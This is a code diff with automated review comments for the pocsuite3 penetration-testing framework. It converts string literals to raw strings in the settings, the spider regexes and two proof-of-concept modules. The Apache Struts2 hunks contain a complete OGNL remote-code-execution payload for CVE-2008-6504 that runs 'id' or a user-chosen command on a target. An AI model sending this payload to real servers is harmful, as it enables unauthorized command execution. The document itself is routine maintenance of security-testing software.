diff --git a/pocsuite3/lib/core/settings.py b/pocsuite3/lib/core/settings.py
index cec7b82e..8246f9ec 100644
--- a/pocsuite3/lib/core/settings.py
+++ b/pocsuite3/lib/core/settings.py
@@ -39,7 +39,7 @@
"Usage of pocsuite for attacking targets without prior mutual consent is illegal."
)
-BANNER = """\033[01;33m
+BANNER = r"""\033[01;33m
,------. ,--. ,--. ,----. \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |
| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <
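Review bot: The `r` prefix on `BANNER` is not value-preserving: inside a raw literal `\033` is four literal characters rather than the ESC byte, so the colour sequences visible on the first art line (`\033[01;33m`, `\033[01;37m`) would be printed verbatim instead of colouring the banner, unless the string is decoded again somewhere outside this hunk. If the aim is to silence invalid-escape warnings caused by backslashes in the ASCII art, keep the literal non-raw and double only those backslashes. Alternatively keep the art raw and prepend the colour code from a normal literal, e.g. `BANNER = "\033[01;33m" + r"""…"""`. The remainder of the banner and the `%` formatting that fills `%d`/`%s` lie outside the hunk, so the rendered output should be checked once after the change.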
@@ -57,7 +57,7 @@
BOLD_PATTERNS = (
"' is vulnerable",
"success",
- "\d ",
+ r"\d ",
)
OLD_VERSION_CHARACTER = ("from comm import cmdline", "from comm import generic")
diff --git a/pocsuite3/modules/spider/__init__.py b/pocsuite3/modules/spider/__init__.py
index 75c65dea..68a053e1 100644
--- a/pocsuite3/modules/spider/__init__.py
+++ b/pocsuite3/modules/spider/__init__.py
@@ -73,9 +73,9 @@ def get_links(self, url, url_ext=()):
def get_redirect_url(url):
# TODO:
# regex need more test cases
- meta_regex = '(?is)\]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
- body_regex = '''(?is)\
]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
- js_regex = '''(?is)[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?'''
+ meta_regex = r'(?is)\]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
+ body_regex = r'''(?is)\]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
+ js_regex = r'''(?is)[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?'''
resp = requests.get(url)
true_url = resp.url
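Review bot: With the `r` prefix the pattern text handed to `re` changes in the three regexes of `get_redirect_url`: `\\\\` inside the character class used to reach the regex engine as two backslashes and now arrives as four. It still matches a single backslash only because it sits inside `[...]`, so the class should be written with `\\` (for example `[\d\w://\\.?=&;%-]`) to keep the raw form readable and to avoid a surprise if the fragment is ever moved out of the class. The existing TODO asks for test cases; a small table of redirect snippets asserted against all three patterns would confirm that the conversion kept behaviour. Separately, `requests.get(url)` on the context line passes no `timeout=`, so one crawled host that never answers stalls the spider. The function body continues outside the hunk.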
diff --git a/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py b/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
index e7cd9af9..a2d14eae 100644
--- a/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
+++ b/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
@@ -36,7 +36,7 @@ def _verify(self):
r = requests.post(paylaod, data=data, headers=headers)
if r.status_code == 200 and "" in r.text:
- m = re.search('', r.text)
+ m = re.search(r'', r.text)
if m:
content = m.group()[:limitSize]
result['FileInfo'] = {}
diff --git a/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py b/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py
index eae674c7..09d6d3bd 100755
--- a/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py
+++ b/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py
@@ -31,7 +31,7 @@ def _options(self):
def _check(self):
result = {}
- exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
+ exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" # noqa: E501
paylaod = exec_payload.format(cmd=quote("id"))
r = requests.get(self.url + "?" + paylaod)
if "groups=" in r.text:
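Review bot: Adding the `r` prefix to `exec_payload` in `_check` changes the string that is sent, not only the warning. The old literal collapsed each `\\` to one backslash (`\\u0023` became `\u0023`, `\\40` became `\40`), while the raw literal keeps both, so the request now carries doubled backslashes. Only the `\%27` sequences were invalid escapes; either keep the literal non-raw and write them as `\\%27`, or keep `r"..."` and reduce every `\\` to `\`. The identical edit is applied to the copy in `_attack` in the next hunk, and holding the template once as a module-level constant would stop the two copies drifting and remove the need for two `# noqa: E501` markers. Both method bodies continue outside their hunks.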
@@ -52,7 +52,7 @@ def _attack(self):
result = {}
if p:
cmd = self.get_option("command")
- exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
+ exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" # noqa: E501
payload = exec_payload.format(cmd=quote(cmd))
r = requests.get(self.url + "?" + payload)
if r.text: